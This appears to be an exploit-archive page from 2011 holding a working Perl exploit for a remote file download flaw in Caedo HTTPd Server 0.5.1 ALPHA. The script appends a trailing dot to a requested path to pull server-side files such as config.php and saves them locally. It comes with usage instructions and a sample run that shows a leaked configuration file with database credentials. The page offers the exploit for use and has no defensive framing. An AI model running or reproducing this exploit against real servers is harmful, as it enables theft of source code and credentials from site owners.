Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download
# Published : 2011-01-29
# Author : Zer0 Thunder
# Previous Title : SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit
# Next Title : Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow

#!/usr/bin/perl
use LWP::Simple;
#Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download Exploit
#Author : Zer0 Thunder
 
if (@ARGV < 3) {
    print("rn");
    print("Caedo HTTPd Server Remote File Download Exploitrn");
    print("Vuln Found and Exploited by Zer0 Thunderrn");
    print("***************************************************");
    print("Usage: " .$0. " [ host]  [ port ] [path] [ file ]rn");
    print("Example: " .$0. " hostingserver.com 80 / config.phprnrn");
    exit(1);
} else {
         print("Caedo HTTPd Server Remote File Download Exploitrn");
   	 print("Vuln Found and Exploited by Zer0 Thunderrn");
    	 print("***************************************************");

    ($target, $port, $path, $file) = @ARGV;
    $result= get("http://" .$target. ":" .$port. "/" .$path. "/".$file. ".");
        print("nFile Content:rnrn");
    print($result. "rn");
    open FILE, ">$file";
    print FILE $result;
    close FILE;
    print " File Saved : $file nn";
	print "---------------------------------------------n";
   	print "site : zt-security.com - colombohackers.comn";
}
#zero@zero-desktop:~/Desktop/exploit$ perl caedo.pl 192.168.1.101 8080 test config.php
#Caedo HTTPd Server Remote File Download Exploit
#Vuln Found and Exploited by Zer0 Thunder
#***************************************************
#File Content:
#
#<?PHP
#Config File
#$db_host = "localhost";
#$db_name = "test";
#$db_user = "test"
#$db_pass = "y0usuck";
#?>
#
# File Saved : config.php 
#
#---------------------------------------------
#site : zt-security.com - colombohackers.com
#zero@zero-desktop:~/Desktop/exploit$